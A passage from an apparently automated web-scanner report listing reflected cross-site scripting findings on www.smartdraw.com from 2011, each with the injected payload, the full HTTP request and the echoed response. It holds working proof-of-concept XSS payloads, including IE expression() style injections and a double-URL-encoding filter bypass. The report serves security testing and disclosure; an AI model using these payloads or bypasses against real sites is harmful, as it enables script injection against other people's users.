<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/sd/buy-sd.htm?id=343769/x22/x3eBuy2e89d"><script>alert(1)</script>e8ef8708314" rel="nofollow" target="_blank">
...[SNIP]...

3.183. http://www.smartdraw.com/specials/sd/buy-sd.htm [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420fb"><script>alert(1)</script>680e9c0cc7 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/sd/buy-sd.htm?id=420fb"><script>alert(1)</script>680e9c0cc7 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3enuo2fogmjygz45lfufc045; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=8FB08E7B-DF57-4420-AED4-F6407D658796; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: SDLINKID=341512; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Set-Cookie: DTIME=2/3/2011; expires=Sun, 03-Feb-2041 20:29:11 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10157
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/sd/buy-sd.htm?id=420fb"><script>alert(1)</script>680e9c0cc7&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;
...[SNIP]...

3.184. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52f2b"><script>alert(1)</script>00c78a59a3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/sd/buy-sd.htm?52f2b"><script>alert(1)</script>00c78a59a3f=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esic0f55gc0skj45f2frl0ij; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=8C687E7D-B3C3-4B52-B907-A04D7B32366C; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: SDLINKID=341512; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: DTIME=2/3/2011; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10157
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/sd/buy-sd.htm?52f2b"><script>alert(1)</script>00c78a59a3f=1" rel="nofollow" target="_blank">
...[SNIP]...

3.185. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceaaa"><script>alert(1)</script>366bac39d96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/sd/buy-sd.htm?ceaaa"><script>alert(1)</script>366bac39d96=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:10 GMT
Content-Length: 10157
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=uqbmzijkk42bap45gozgoazf; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=E585BCC2-52CC-4BB6-9195-07613BE89FFC; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: SDLINKID=341512; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Set-Cookie: DTIME=2/3/2011; expires=Sun, 03-Feb-2041 20:29:10 GMT; path=/
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/sd/buy-sd.htm?ceaaa"><script>alert(1)</script>366bac39d96=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.186. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed6dd36217 was submitted in the REST URL parameter 2. This input was echoed as 1fb77"><script>alert(1)</script>1ed6dd36217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/1fb77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed6dd36217?id=104640/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:13 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:13 GMT; path=/
Set-Cookie: ASP.NET_SessionId=rgc5ewevo3ic5ebzjtk3pcfy; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8816
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/1fb77"><script>alert(1)</script>1ed6dd36217/?id=104640/x22&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500p
...[SNIP]...

3.187. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ab3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252263feb98e41a was submitted in the REST URL parameter 2. This input was echoed as 16ab3"style="x:expression(alert(1))"63feb98e41a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/16ab3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252263feb98e41a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:14 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:14 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xznk3xfpvt4fwq45lltljxjn; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8746
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/16ab3"style="x:expression(alert(1))"63feb98e41a/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.188. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7102c9c5a8 was submitted in the REST URL parameter 2. This input was echoed as fff10"><script>alert(1)</script>a7102c9c5a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/smartdraw.aspfff10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7102c9c5a8?id=104640/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1kyde4v2dk5z4w45pkuoyr55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8900
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/smartdraw.aspfff10"><script>alert(1)</script>a7102c9c5a8?id=104640/x22" rel="nofollow" target="_blank">
...[SNIP]...

3.189. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46591%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294313ed1278 was submitted in the REST URL parameter 2. This input was echoed as 46591"style="x:expression(alert(1))"94313ed1278 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/46591%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294313ed1278 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=2ksoxp55cqqywc453rftb3vt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8746
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/46591"style="x:expression(alert(1))"94313ed1278/" rel="nofollow" target="_blank">
...[SNIP]...

3.190. http://www.smartdraw.com/specials/smartdraw.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84bb8"><script>alert(1)</script>626eeb09dab was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/smartdraw.asp?id=84bb8"><script>alert(1)</script>626eeb09dab HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=srd; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qm4opd450d3t0ub4vr15fu55; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=ADF8185B-28EB-4439-83C3-ED4994B5DBD1; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: SDLINKID=42485; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13596
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">
   <head>
    <!-- WEB1 -->
       <meta http-equiv="Co
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/smartdraw.asp?id=84bb8"><script>alert(1)</script>626eeb09dab&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;
...[SNIP]...

3.191. http://www.smartdraw.com/specials/smartdraw.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9eb8"><script>alert(1)</script>02409d83cd8 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/smartdraw.asp?id=104640/x22d9eb8"><script>alert(1)</script>02409d83cd8 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=srd; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3xzk4kqkklhxog55txic5t55; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=7224F4A2-DD79-495E-BE74-D529A406C1A4; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: SDLINKID=42485; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13666
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">
   <head>
    <!-- WEB4 -->
       <meta http-equiv="Co
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/smartdraw.asp?id=104640/x22d9eb8"><script>alert(1)</script>02409d83cd8" rel="nofollow" target="_blank">
...[SNIP]...

3.192. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a0d8"><script>alert(1)</script>19f5f3d2721 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/smartdraw.asp?9a0d8"><script>alert(1)</script>19f5f3d2721=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=srd; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b13fkq55uk0h0r551wlijart; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=0C716256-E9A8-4F56-B555-3BBBF2BE9A9A; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: SDLINKID=42485; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13589
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">
   <head>
    <!-- WEB3 -->
       <meta http-equiv="Co
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/smartdraw.asp?9a0d8"><script>alert(1)</script>19f5f3d2721=1" rel="nofollow" target="_blank">
...[SNIP]...

3.193. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6931"><script>alert(1)</script>1538439b5db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/smartdraw.asp?f6931"><script>alert(1)</script>1538439b5db=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:03 GMT
Content-Length: 13589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=srd; expires=Sun, 03-Feb-2041 20:29:03 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:03 GMT; path=/
Set-Cookie: ASP.NET_SessionId=i4f3to45piqrah5515hwc2e5; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=9F5DDF94-02C1-40EC-BAF3-B26FC6BAC886; expires=Sun, 03-Feb-2041 20:29:03 GMT; path=/
Set-Cookie: SDLINKID=42485; expires=Sun, 03-Feb-2041 20:29:03 GMT; path=/
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">
   <head>
    <!-- WEB2 -->
       <meta http-equiv="Co
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/smartdraw.asp?f6931"><script>alert(1)</script>1538439b5db=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.194. http://www.smartdraw.com/support/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37c3c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e679ad699d2 was submitted in the REST URL parameter 1. This input was echoed as 37c3c"style="x:expression(alert(1))"e679ad699d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /37c3c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e679ad699d2/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=o1ruv145ogifusajxf15cv45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/37c3c"style="x:expression(alert(1))"e679ad699d2/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.195. http://www.smartdraw.com/support/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd21%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229340ce36f21 was submitted in the REST URL parameter 1. This input was echoed as 5cd21"style="x:expression(alert(1))"9340ce36f21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /support5cd21%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229340ce36f21/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
